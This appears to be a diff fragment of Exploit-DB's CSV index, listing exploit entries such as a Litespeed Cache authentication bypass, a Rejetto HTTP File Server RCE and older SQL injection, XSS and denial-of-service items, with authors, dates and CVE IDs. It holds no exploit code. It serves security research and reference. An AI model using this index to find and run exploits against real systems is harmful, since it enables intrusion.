33751,exploits/php/webapps/33751.txt,"CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Inclusions",2010-03-11,eidelweiss,webapps,php,,2010-03-11,2014-06-14,1,,,,,,https://www.securityfocus.com/bid/38672/info
@ -22777,6 +22780,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6206,exploits/php/webapps/6206.txt,"LiteNews 0.1 - Insecure Cookie Handling",2008-08-05,Scary-Boys,webapps,php,,2008-08-04,,1,OSVDB-47552;CVE-2008-3508,,,,,
17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",webapps,php,,2011-07-13,2012-10-28,1,,,,,,
26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",webapps,php,,2005-11-17,2013-07-02,1,CVE-2005-3695;OSVDB-20908,,,,,https://www.securityfocus.com/bid/15485/info
52099,exploits/php/webapps/52099.py,"Litespeed Cache 6.5.0.1 - Authentication Bypass",2025-03-28,"Caner Tercan",webapps,php,,2025-03-28,2025-03-28,0,CVE-2024-44000,,,,,
11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,webapps,php,,2010-02-18,2010-08-31,1,OSVDB-62449,,,,http://www.exploit-db.comlsws-4.0.12-std-i386-linux.tar.gz,
49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,,2021-02-05,2021-02-05,0,,,,,,
25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",webapps,php,,2005-06-03,2013-05-28,1,,,,,,https://www.securityfocus.com/bid/13850/info
@ -35331,6 +35335,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52001,exploits/typescript/webapps/52001.txt,"Flowise 1.6.5 - Authentication Bypass",2024-04-21,"Maerifat Majeed",webapps,typescript,,2024-04-21,2024-04-21,0,CVE-2024-31621,,,,,
51385,exploits/typescript/webapps/51385.txt,"FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)",2023-04-20,"Rodolfo Mariano",webapps,typescript,,2023-04-20,2023-04-20,0,,,,,,
51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-06-09,1,CVE-2019-13068,,,,,
52102,exploits/typescript/webapps/52102.py,"Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)",2025-03-28,VeryLazyTech,webapps,typescript,,2025-03-28,2025-03-28,0,CVE-2024-23692,,,,,
19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info
698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,,
22068,exploits/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,dos,unix,,2002-12-04,2016-12-19,1,CVE-2002-2272;OSVDB-7394,,,,,https://www.securityfocus.com/bid/6320/info

Can't render this file because it is too large.